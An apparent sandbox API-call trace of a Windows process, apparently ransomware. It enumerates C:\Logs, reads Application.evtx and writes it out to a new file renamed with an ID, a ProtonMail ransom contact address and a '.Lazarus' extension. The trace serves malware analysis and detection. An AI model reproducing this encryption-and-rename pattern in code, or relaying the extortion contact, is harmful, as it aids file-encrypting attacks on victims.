[0084.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.678] AreFileApisANSI () returned 1 [0084.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs", lpUsedDefaultChar=0x0) returned 8 [0084.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0084.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0084.678] AreFileApisANSI () returned 1 [0084.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0084.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x7d588, cchWideChar=8 | out: lpWideCharStr="C:\\Logs") returned 8 [0084.678] CreateFileW (lpFileName="C:\\Logs" (normalized: "c:\\logs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.678] GetLastError () returned 0x5 [0084.678] GetLastError () returned 0x5 [0084.678] SetLastError (dwErrCode=0x5) [0084.678] GetLastError () returned 0x5 [0084.678] SetLastError (dwErrCode=0x5) [0084.678] GetLastError () returned 0x5 [0084.678] SetLastError (dwErrCode=0x5) [0084.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0084.678] AreFileApisANSI () returned 1 [0084.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0084.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x7d6a8, cchWideChar=8 | out: lpWideCharStr="C:\\Logs") returned 8 [0084.679] CreateFileW (lpFileName="C:\\Logs" (normalized: "c:\\logs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.679] GetLastError () returned 0x5 [0084.679] GetLastError () returned 0x5 [0084.679] SetLastError (dwErrCode=0x5) [0084.679] GetLastError () returned 0x5 [0084.679] SetLastError (dwErrCode=0x5) [0084.679] GetLastError () returned 0x5 [0084.679] SetLastError (dwErrCode=0x5) [0084.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0084.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.679] FindNextFileW (in: hFindFile=0x78850, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0x21ffac8, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0084.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0084.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0084.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.679] FindFirstFileExW (in: lpFileName="C:\\Logs\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78f10 [0084.823] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0x8de25170, ftLastAccessTime.dwHighDateTime=0x1d5df27, ftLastWriteTime.dwLowDateTime=0x8de25170, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.824] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5052fa31, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5052fa31, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Application.evtx", cAlternateFileName="APPLIC~1.EVT")) returned 1 [0084.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0084.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0084.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0084.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0084.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0084.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0084.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0084.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0084.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0084.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0084.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0084.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0084.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0084.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0084.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0084.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0084.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0084.825] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.825] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.825] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.825] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0084.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0084.825] AreFileApisANSI () returned 1 [0084.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Application.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Application.evtx", lpUsedDefaultChar=0x0) returned 25 [0084.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.825] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.825] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0084.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0084.825] AreFileApisANSI () returned 1 [0084.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0084.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x32) returned 0x78950 [0084.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x78950, cchWideChar=25 | out: lpWideCharStr="C:\\Logs\\Application.evtx") returned 25 [0084.826] CreateFileW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0084.826] GetFileType (hFile=0x424) returned 0x1 [0084.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78950 | out: hHeap=0x20000) returned 1 [0084.827] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.827] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.827] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.827] CloseHandle (hObject=0x424) returned 1 [0084.827] AreFileApisANSI () returned 1 [0084.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0084.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x32) returned 0x78c50 [0084.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x78c50, cchWideChar=25 | out: lpWideCharStr="C:\\Logs\\Application.evtx") returned 25 [0084.827] CreateFileW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0084.827] GetFileType (hFile=0x424) returned 0x1 [0084.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78c50 | out: hHeap=0x20000) returned 1 [0084.828] CloseHandle (hObject=0x424) returned 1 [0084.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0084.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0084.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0084.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0084.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0084.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0084.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0084.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0084.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0084.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0084.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0084.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0084.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0084.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0084.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0084.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0084.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0084.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0084.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0084.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0084.828] AreFileApisANSI () returned 1 [0084.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0084.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x32) returned 0x78c50 [0084.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x78c50, cchWideChar=25 | out: lpWideCharStr="C:\\Logs\\Application.evtx") returned 25 [0084.828] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5052fa31, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5052fa31, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0084.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78c50 | out: hHeap=0x20000) returned 1 [0084.828] AreFileApisANSI () returned 1 [0084.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0084.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.829] GetLastError () returned 0x0 [0084.829] SetLastError (dwErrCode=0x0) [0084.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e228 [0084.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x53970 [0084.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c288 [0084.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0084.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d750 [0084.829] GetLastError () returned 0x0 [0084.829] SetLastError (dwErrCode=0x0) [0084.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0084.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0084.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6dc60 [0084.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0084.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x6a3b0 [0084.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dc60 | out: hHeap=0x20000) returned 1 [0084.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0084.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.830] AreFileApisANSI () returned 1 [0084.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6a3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0084.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81130 [0084.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6a3b0, cbMultiByte=-1, lpWideCharStr=0x81130, cchWideChar=87 | out: lpWideCharStr="C:\\Logs\\Application.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 87 [0084.830] CreateFileW (lpFileName="C:\\Logs\\Application.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\logs\\application.evtx.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0084.830] GetFileType (hFile=0x424) returned 0x1 [0084.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0084.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0084.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0084.831] AreFileApisANSI () returned 1 [0084.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0084.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x32) returned 0x78c50 [0084.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x78c50, cchWideChar=25 | out: lpWideCharStr="C:\\Logs\\Application.evtx") returned 25 [0084.831] CreateFileW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0084.831] GetFileType (hFile=0x354) returned 0x1 [0084.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78c50 | out: hHeap=0x20000) returned 1 [0084.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0084.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.831] GetLastError () returned 0x0 [0084.831] SetLastError (dwErrCode=0x0) [0084.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.831] GetLastError () returned 0x0 [0084.831] SetLastError (dwErrCode=0x0) [0084.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0084.831] ReadFile (in: hFile=0x354, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0084.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0084.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0084.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0084.833] GetLastError () returned 0x0 [0084.833] SetLastError (dwErrCode=0x0) [0084.834] GetLastError () returned 0x0 [0084.834] SetLastError (dwErrCode=0x0) [0084.834] GetLastError () returned 0x0 [0084.834] SetLastError (dwErrCode=0x0) [0084.834] GetLastError () returned 0x0 [0084.834] SetLastError (dwErrCode=0x0) [0084.834] ReadFile (in: hFile=0x354, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0084.834] WriteFile (in: hFile=0x424, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0084.835] GetLastError () returned 0x0 [0084.835] SetLastError (dwErrCode=0x0) [0084.835] GetLastError () returned 0x0 [0084.835] SetLastError (dwErrCode=0x0) [0084.836] GetLastError () returned 0x0 [0084.836] SetLastError (dwErrCode=0x0) [0084.890] 